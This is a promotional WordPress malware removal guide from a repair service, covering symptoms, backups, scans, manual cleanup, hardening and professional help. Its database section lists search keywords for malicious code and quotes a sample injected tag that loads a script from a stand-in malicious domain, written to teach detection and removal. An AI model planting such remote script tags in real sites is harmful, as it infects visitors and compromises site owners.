Your Guide to WordPress Malware Removal

Discovering your website has been hacked is a truly awful feeling. But please know, you're not alone in this, and it's absolutely fixable. The first sign isn't always a giant, flashing "You've been hacked!" message on your homepage. Often, the clues are much more subtle—a sudden drop in traffic, a site that’s suddenly slow as a snail, or a scary warning from Google.

Don't worry. This guide will walk you through, step-by-step, how to spot the problem, understand what's happening, and start putting together a solid plan for WordPress malware removal. Let's get your site back to health.

Recognising the Signs of a Hacked WordPress Site

That gut-wrenching moment when you think your site might be compromised is something many of us have experienced. Most people only notice something is wrong when the site completely breaks, but malware usually leaves small clues long before the real damage is done.

The truth is, WordPress security is a huge deal. A recent security survey revealed that a shocking 96% of WordPress users had run into at least one security issue, and 64% had been fully breached. Even with those numbers, only about 25% had a recovery plan ready. You can read more about these stats over at Melapress.com. This is exactly why learning to spot the symptoms early is so crucial for a quick, effective cleanup.

Common Symptoms of a Malware Infection

While a completely trashed homepage is the most obvious sign of a hack, most infections try to stay under the radar. Hackers would rather use your site's resources quietly without you noticing.

Here’s what to look out for:

  • Your site is suddenly very slow: If your website starts loading at a crawl for no apparent reason, malware could be hogging your server's resources.
  • Weird redirects to spammy sites: This is a classic. You or your visitors try to open a page, but instead, you land on some shady-looking pharmacy or gambling site.
  • Strange pop-ups and ads appear: New, unfamiliar ad banners or pop-ups that you didn't put there are a massive red flag.
  • New admin users you don't recognise: Finding a new administrator account in your WordPress dashboard that you didn’t create is a dead giveaway that someone else has the keys.

Sometimes, you might see a warning message when you try to visit your site, like the one below. This is Google's Safe Browsing feature doing its job, protecting visitors from potentially harmful sites—including yours, if it's been compromised.

It's easy to dismiss some of these signs as simple glitches, but it's important to know the difference. Before you panic, check this table to see if you're dealing with a hack or just a common website issue.

Malware Symptoms vs Common Site Issues

This quick reference table can help you figure out if you're looking at a security breach or a different kind of technical problem.

Symptom Likely Malware-Related Cause Potential Non-Malware Cause
Site is slow Malicious scripts are running in the background, using up server resources. A large, unoptimised image file; a poorly coded plugin; or a problem with your hosting provider.
Strange pop-ups A malicious script has been injected into your site's code to display ads. A new plugin you installed might have a legitimate (but annoying) advertising feature.
Weird redirects Hackers have added redirect code to your .htaccess file or core WordPress files. A misconfigured setting in an SEO or redirection plugin.
Site looks broken Malware has corrupted your theme files or stylesheets. A recent plugin or theme update caused a conflict, or a simple caching issue.
White Screen of Death A malicious script is causing a fatal PHP error. A plugin or theme conflict, or you've exceeded your server's memory limit.

While a bad plugin can certainly make your site misbehave, the symptoms caused by malware are often more persistent and harder to explain. If you've ruled out the usual suspects and the problem continues, it's time to assume you're dealing with an infection.

Less Obvious Clues to Investigate

Sometimes, the evidence of a hack is buried deep where you wouldn't normally look. If you're seeing any of the problems mentioned above, it’s worth digging a bit deeper for these more technical signs.

A key takeaway for any site owner is that malware rarely announces its presence loudly. It often starts as a quiet process in the background—a modified file here, a strange database entry there. Proactive monitoring is your best defence.

For instance, you might find suspicious-looking files or folders in your /wp-content/uploads/ directory that you know you didn't upload. Another classic hiding spot is malicious code injected directly into your theme's header.php or footer.php files—something you'd never notice unless you looked at the code itself. Getting familiar with these common hiding spots will help you act fast when it counts.

Preparing for a Safe and Thorough Cleanup

Okay, before you touch a single line of code or delete any files, it's really important to stop and prepare. I've seen it happen too many times: a site owner panics and rushes in, only to make the problem a lot worse. Think of this preparation phase not as a delay, but as your safety net.

Imagine you're a surgeon. You wouldn't go into an operation without a plan, the right tools, or a way to handle surprises. The same principle applies here. Taking a few organised steps now will make the entire cleanup process smoother and far less stressful.

First, Back Up Your Infected Site

This is going to sound completely backwards, I know, but the very first thing you need to do is take a full backup of your hacked website. Yes, you read that right. We're creating a copy of something you know is compromised.

Why? Because this backup is your "undo" button. If you accidentally delete a critical file during the cleanup and break your site completely, this backup lets you restore it to its current (infected) state. It gives you a fresh start on the cleanup without causing irreversible damage.

Most hosting providers have one-click backup tools, or you can use a trusted WordPress plugin. Just make sure you get a complete copy of both:

  • Your website files: Every single folder and file in your WordPress installation.
  • Your database: This is where all your posts, pages, user accounts, and settings live.

Once you have the backup file, download it to your local computer for safekeeping and immediately delete any copies left on the server. You don't want a compromised zip file sitting around.

This backup is purely for emergency recovery during the cleanup. It is not a 'clean' version you can restore later to solve the problem.

Gather Your Essential Access Credentials

To do this job properly, you'll need to get your hands dirty with the site's core files and database. The standard WordPress admin dashboard simply won't be enough.

Before you go any further, take a moment to hunt down and organise the following credentials:

  • FTP/SFTP/SSH Access: These are the keys to your server. They let you browse, download, and modify your website's files directly. You can usually find these details in your hosting provider’s control panel (like cPanel or Plesk).
  • Hosting Control Panel Login: You’ll need access to your main hosting account to manage databases, check server logs, and handle other top-level settings.
  • phpMyAdmin Access: This tool gives you a direct window into your WordPress database. Malicious code loves to hide in database tables, so being able to inspect them is non-negotiable.

Having all this information ready to go will save you a ton of time and frustration later. If you’re unsure where to find any of these, a quick message to your hosting provider’s support team should sort it out.

Identify Your Tools and Run Initial Scans

With a backup secured and your credentials in hand, the final prep step is to get an initial look at the damage. Running a few scans now will help you build a 'hit list' of suspicious files, giving you a map of the infection before you start removing anything.

I always recommend a two-pronged approach. First, use a security plugin installed on your WordPress site. It can do a quick sweep of your theme and plugin files and will often flag common malware signatures right away.

But plugins can be compromised themselves and can't always see the full picture. That's why you also need an external scanner. These tools scan your site from the outside—the same way Google sees it—and can spot malicious redirects, check your blacklisting status, and find other problems an internal scan might miss.

Using both gives you a much clearer view of what you're up against. At this stage, the goal isn't to let these tools automatically fix everything. It's about gathering intelligence. The reports they generate will be your guide for the manual cleanup to come.

With these preparations sorted, you're now in the best possible position to start the real work.


Meta Description:

Feeling overwhelmed by a hacked WordPress site? This friendly guide explains the first steps for a safe WordPress malware removal, from backups to initial scans.

A Practical Guide to Manual Malware Removal

Right, it’s time to roll up our sleeves. Manually removing WordPress malware can feel like you’re about to perform open-heart surgery on your site, especially if you’re not a developer. But I want you to think of this less as a scary operation and more as a guided tour through your site’s digital filing cabinets.

We’re going to methodically check the most common hiding spots, clean out the junk, and get your site back to full health.

The manual approach gives you total control and a much deeper understanding of how your own website is put together. It definitely requires patience, but trust me, successfully cleaning your own site is an incredibly empowering feeling. Let’s walk through this together, focusing on three key areas: your files, the WordPress core, and your database.

Here’s an infographic that breaks down what the manual removal process looks like from a developer’s perspective, targeting and removing malicious code line by line.

This visual really highlights the precision needed. It's not about torching everything in sight, but carefully cutting out only the infected bits to keep your site's structure intact.

Navigating Common Malware Hiding Spots

First up, we’re going on a hunt for suspicious files. You’ll need to fire up your FTP/SFTP client or log into your hosting provider’s File Manager for this part. Hackers are crafty and often try to hide their malicious scripts in plain sight, using names that look legitimate or tucking them away in folders you might not think to check.

One of their favourite playgrounds is the /wp-content/uploads/ directory. Because this folder needs to be writable for you to upload images, it becomes an easy target. A great trick here is to sort the files by the "Last Modified" date.

If you see PHP files (.php) in there that were changed recently—especially if they're sitting amongst your JPEGs and PNGs—that’s a massive red flag. Legitimate uploads are media files, not executable code.

Other folders to search with a fine-tooth comb include:

  • /wp-includes/
  • /wp-admin/
  • The root directory of your WordPress installation

Be on the lookout for files with strange, jumbled names (like dsf87wef.php) or files that mimic real WordPress ones but with a sneaky misspelling (e.g., a fake wp-loads.php instead of the real wp-load.php). When you find something that clearly doesn’t belong, delete it. I know it can feel a bit nerve-wracking, but remember that backup you took? It’s your safety net if you accidentally remove the wrong thing.

Replacing Your WordPress Core Files

After you’ve cleared out the obvious intruders, the next step is to make sure the very foundation of your site is clean. Malware often worms its way into core WordPress files because it knows most site owners never look in there. Honestly, trying to find every tiny modification is nearly impossible.

So, instead of hunting for needles in a haystack, we're just going to replace the entire haystack.

This means replacing your current /wp-admin/ and /wp-includes/ directories with fresh, clean copies straight from the source at WordPress.org.

  1. Download a fresh copy: Head over to the official WordPress.org release archive and download the exact same version you are currently running. This is crucial.
  2. Unzip the files: Unpack the downloaded file on your computer.
  3. Delete the old directories: Using FTP or your File Manager, delete the /wp-admin/ and /wp-includes/ folders from your server. Yes, this step can feel scary, but it's the only way to be sure.
  4. Upload the new ones: Now, upload the fresh /wp-admin/ and /wp-includes/ folders from the clean copy you just unzipped.

Heads Up: Do not delete your /wp-content/ folder! This is where your themes, plugins, and uploads live—all the things that make your site unique. We also leave the wp-config.php file in the root directory alone for now, as it contains your vital database connection details.

This one action effectively resets all your core files to their original state, wiping out any malicious code that was hiding inside them.

Cleaning the WordPress Database

This is often the most intimidating part of a manual cleanup, but it's where some of the nastiest malware loves to lurk. The scale of WordPress malware infections is staggering, reflecting a global rise in cyber threats. Security firms report hundreds of thousands of infected WordPress sites worldwide, and these hacks often stem from vulnerable plugins and themes, which is why a deep clean of the database is so critical. For more on this, check out Patchstack's 2025 whitepaper.

To get started, you'll need a tool like phpMyAdmin, which you can usually find in your hosting control panel. Once you're in, you'll be looking directly at your database tables.

There are two key tables to inspect right away:

  • wp_users: Scan this table for any user accounts you don't recognise. If you find a user with administrator privileges that you didn't create, you've found a major security breach. Select that user's row and delete it immediately.

  • wp_posts: Hackers love to inject malicious JavaScript or spammy links directly into your posts and pages. You can run a search within this table for common malicious keywords like <script>, eval(, and base64_decode. For instance, a search might uncover a post that looks normal on the front end but contains a hidden script in the database:
    My latest blog post content... <script src='http://malicious-domain.com/bad-script.js'></script>

When you find these, you need to carefully edit that specific post or page to remove only the malicious code, leaving your legitimate content untouched. It can be tedious work, but it’s a non-negotiable part of a thorough WordPress malware removal process. For a deeper dive, our comprehensive guide on how to remove malware from WordPress has more advanced tips.

Finishing a manual cleanup is a huge accomplishment. You’ve just performed digital surgery on your own website and gained invaluable knowledge about how it all works. This process not only fixes the immediate problem but also makes you far better equipped to protect your site in the future.

Hardening Your WordPress Site After the Attack

You’ve done the hard work of cleaning out the infection, and your site is finally back online. Take a moment to breathe—you've just navigated a seriously stressful situation. But our work isn't quite finished. Completing a WordPress malware removal is only half the battle; the real victory is making sure this never, ever happens again.

Now is the perfect time to turn your attention from cleanup to fortification. The attackers found a way in, which means there was a vulnerability somewhere. Our mission now is to find and seal every one of those entry points, transforming your site from a potential target into a secure fortress. Let's build a resilient defence that gives you long-term peace of mind.

Immediate Security Resets

First things first: we need to assume every password you had has been compromised. Attackers often steal credentials to create backdoors, allowing them to waltz right back in after you’ve cleaned up. We need to lock them out for good by performing a sitewide password reset.

This isn't just about your WordPress admin account. You need to change every single password associated with your website. Seriously, all of them.

  • All WordPress User Accounts: Especially any with administrator or editor roles.
  • Hosting Control Panel: Your cPanel, Plesk, or custom hosting dashboard login.
  • FTP/SFTP Accounts: The credentials you use to access your site’s files directly.
  • Database Password: This is stored in your wp-config.php file and is a prime target for theft.

I know it feels like a hassle, but this is a non-negotiable step. It ensures that any stolen keys the hackers might be holding become completely useless.

Update and Clean Out Everything

Outdated software is the number one reason WordPress sites get hacked. It’s a global issue—the WordPress ecosystem saw thousands of new security holes emerge last year, and the overwhelming majority didn't come from the core software, but from third-party add-ons.

This means your next move is a thorough software audit. Head straight to your WordPress dashboard and update absolutely everything in sight.

  • WordPress Core: Make sure you're running the latest version.
  • All Plugins: Update every single one. If a plugin hasn't been touched by its developer in over a year, find a modern replacement.
  • All Themes: Update your active theme and any others you have installed.

After updating, be ruthless. If you aren't using a plugin or theme, delete it. A deactivated plugin is just a dormant security risk waiting for an attacker to exploit.

Build Your Proactive Defence Layers

With the immediate holes plugged, it’s time to build some layers of proactive protection. These are the tools and practices that work around the clock to stop attacks before they can even get started.

A great starting point is implementing Two-Factor Authentication (2FA) on your WordPress login page. This means that even if a hacker steals your password, they can't log in without a second code, usually from your phone. It’s one of the single most effective ways to stop unauthorised access.

Next, get a Web Application Firewall (WAF) in place. Think of a WAF as a security guard standing between your website and the internet. It actively filters incoming traffic, blocking known malicious requests, brute-force attacks, and attempts to exploit vulnerabilities before they ever reach your site.

Finally, put your security on autopilot. Schedule automated daily security scans using a reputable plugin. These scans will continuously check your files and database for any signs of trouble, alerting you immediately if something suspicious is found. For a more detailed look at what this involves, you can explore our guide to website security best practices.

By taking these hardening steps, you’re not just recovering from an attack; you’re fundamentally changing your website's security posture. You’re moving from a reactive position to a proactive one, which is the key to staying safe long-term.

Contact us to learn more about our comprehensive security solutions.


Meta Description:

After a WordPress malware removal, harden your site to prevent future attacks. Learn to reset passwords, update everything, and add proactive security layers.

Knowing When to Call in the Professionals

Taking on a manual cleanup yourself can be really rewarding, but it's also crucial to know your limits. While this guide gives you the tools to handle many common infections, some malware is just too complex or deeply embedded for a DIY approach. Pushing forward without the right expertise can sometimes make a bad situation even worse.

There’s absolutely no shame in asking for help. In fact, realising you need to bring in an expert is a smart and responsible decision. Your time is valuable. Spending days, or even weeks, chasing elusive malicious code is a frustrating time-sink when you could be focused on running your business.

Red Flags: When to Hand It Over

Recognising the signs that you're in over your head is the most important step. If you're stuck in a frustrating cycle of cleaning your site only to see the malware pop right back up a few hours later, you're almost certainly dealing with a hidden backdoor. That’s a classic sign that it’s time to call in a professional.

Here are a few other clear indicators that a DIY fix isn't cutting it:

  • You're on the Google Blacklist: Getting off Google's blacklist requires a specific review process. Security experts handle these appeals all the time and know exactly what's needed to get your domain cleared quickly.
  • The Infection Is in Your Database: If you’ve traced malware deep into your database tables and you're not 100% confident you can remove it without breaking everything, stop what you’re doing. An expert can perform surgical-level cleanup and preserve your site's data integrity.
  • You're Simply Overwhelmed: Sometimes you just know when you're out of your depth. If the manual steps feel too technical or the risk seems too high, that's a perfectly good reason to hire someone who does this for a living.

What a Professional Service Really Gives You

When you hire an expert, you’re not just paying someone to delete a few bad files. You're investing in a guaranteed result and, just as importantly, peace of mind. Professional services offer a much deeper level of WordPress malware removal, using sophisticated diagnostic tools to find threats that are invisible to standard scans.

The real value of a professional service is certainty. They have the experience to not only eradicate the current infection but also to find and patch the original vulnerability, locking the door so the attackers can't just waltz back in.

They provide a complete solution, not just a temporary fix. For anyone fighting a stubborn infection, looking into dedicated WordPress malware removal services is often the fastest and most reliable way to get your site healthy again. It’s about making the right choice for your website, your business, and your own sanity.

If you're facing a tough infection and aren't sure what to do next, feel free to get in touch to see how we can help.


Meta Description:

Learn when a DIY WordPress malware removal isn't enough. Discover the signs it's time to call a security professional and the benefits they offer.

Your WordPress Malware Removal Questions Answered

When you're staring down a website security crisis, a million questions probably start racing through your mind. It’s completely natural. In the heat of the moment, you need clear, straightforward answers to get your bearings. This FAQ is here to tackle the most common concerns we see during a WordPress malware removal, helping you cut through the noise and move forward with confidence.

Let's break down the technical jargon and give you the simple, reassuring explanations you need right now.

How Did My WordPress Site Get Hacked in the First Place?

It's the first question almost every site owner asks, and the answer is usually less dramatic than you'd think. More often than not, it’s less about being a high-profile target and more about having a common vulnerability that an automated bot stumbled upon. These bots are constantly crawling the web, rattling digital doorknobs to find an easy way in.

The top culprits are almost always one of the following:

  • Outdated Software: This is the big one. An old plugin, theme, or even WordPress core itself is like an open invitation. These versions often have known security holes that hackers actively hunt for and exploit.
  • Weak Passwords: It sounds simple, but passwords like "admin123" or "password123!" are cracked by brute-force attacks in seconds. It's the digital equivalent of leaving your front door wide open.
  • "Nulled" or Pirated Add-ons: Tempted by a free version of a premium theme or plugin? Please don't be. These are almost always bundled with hidden backdoors that give an attacker full access the moment you hit 'activate'.
  • Poor Hosting Security: Sometimes the problem isn't your site, but the server it shares with others. A weakness on another website on the same shared server can sometimes lead to cross-site contamination, infecting your site through no fault of your own.

Can I Just Restore a Backup to Get Rid of the Malware?

Restoring a backup feels like a perfect, one-click fix, but it's a risky gamble that rarely pays off in the long run. While it seems simple on the surface, this approach is full of potential pitfalls.

For starters, you have to be 100% certain the backup you’re restoring is completely clean. Malware can lie dormant on a site for weeks or even months before causing any visible problems, meaning your recent backups are likely already infected.

Restoring an infected backup is like tidying up a room but leaving the intruder hiding in the closet. The problem will just reappear, and often much faster the second time.

Even if you manage to find a truly clean backup, you'll lose any content, customer orders, or user comments added since that point. More importantly, restoring the site doesn't fix how the attacker got in. Without patching that original security hole, your site is just a sitting duck waiting for the next attack.

Will a Security Plugin Automatically Clean Everything?

Security plugins are brilliant tools and absolutely essential for any WordPress security plan. A good scanner will find and automatically remove the vast majority of common malware infections, saving you a massive amount of time and stress.

But they aren't a magic button. Highly sophisticated or brand-new malware might be engineered to evade an automated scan.

Some malware is also clever enough to inject its malicious code into legitimate, critical WordPress files. In these situations, a scanner might flag the file but won't delete it automatically because doing so would break your site. It's best to think of a security plugin as your first and most powerful line of defence—your primary scanner and cleanup assistant—but you should always follow it up with manual checks and the hardening steps we've covered to ensure every last trace is truly gone.


At LINX Repair Websites, we know just how stressful a hacked website can be. If you're feeling overwhelmed or just want a guaranteed fix, our experts are here to help. Contact us to learn more about our fast, no-fix–no-fee WordPress malware removal service.

Scroll to Top